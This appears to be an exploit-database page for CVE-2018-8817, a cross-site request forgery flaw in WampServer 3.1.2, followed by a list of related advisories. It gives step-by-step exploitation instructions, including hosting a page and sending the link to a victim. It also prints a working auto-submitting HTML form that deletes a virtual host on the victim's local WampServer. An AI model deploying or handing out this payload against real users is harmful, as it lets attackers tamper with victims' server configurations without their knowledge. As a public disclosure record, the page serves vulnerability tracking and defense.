Lucene search
Vipinxsec1337DAY-ID-30089HistoryMar 31, 2018 - 12:00 a.m.
WampServer 3.1.2 CSRF to add or delete any virtual hosts remotely Vulnerability
2018-03-3100:00:00
vipinxsec
0day.today
173
0.002 Low
EPSS
Percentile
58.9%
Exploit for php platform in category web applications
WampServer 3.1.2 CSRF to add or delete any virtual hosts remotely (CVE-2018-8817)
CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote attacker to force any victim to add or delete virtual hosts.
http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722
How to exploit this CSRF vulnerability:
1. Go to Add a Virtual host and add one to wampserver.
2. Now intercept the request with proxy tool like burp suite.
3. Now make a CSRF PoC of the request and to exploit you can host it on internet and send the link to the victim.
<html>
<body onload="wamp_csrf.submit();">
<form action="http://localhost/add_vhost.php?lang=english" name="wamp_csrf" method="POST">
<input type="hidden" name="virtual_del[]" value="localhost" />
<input type="hidden" name="vhostdelete" value="Suppress VirtualHost" />
</form>
</body>
</html>
# 0day.today [2018-04-04] #Related
cvelist
cvelist
CVE-2018-8817
2018-03-25 19:00:00
CVE-2019-11517
2019-06-10 17:47:49
exploitpack
exploitpack
WampServer 3.1.2 - Cross-Site Request Forgery
2018-04-02 00:00:00
nvd
nvd
CVE-2018-8817
2018-03-25 19:29:00
CVE-2019-11517
2019-06-10 18:29:00
packetstorm
packetstorm
Wampserver 3.1.8 Cross Site Request Forgery
2019-06-10 00:00:00
WampServer 3.1.2 Cross Site Request Forgery
2018-04-02 00:00:00
openvas
openvas
WampServer < 3.1.3 CSRF Vulnerability
2018-03-27 00:00:00
WampServer >= 3.1.3, <= 3.1.8 CSRF Vulnerability
2019-06-11 00:00:00
cve
cve
CVE-2018-8817
2018-03-25 19:29:00
CVE-2019-11517
2019-06-10 18:29:00
prion
prion
Cross site request forgery (csrf)
2018-03-25 19:29:00
Cross site request forgery (csrf)
2019-06-10 18:29:00
exploitdb
exploitdb
WampServer 3.1.2 - Cross-Site Request Forgery
2018-04-02 00:00:00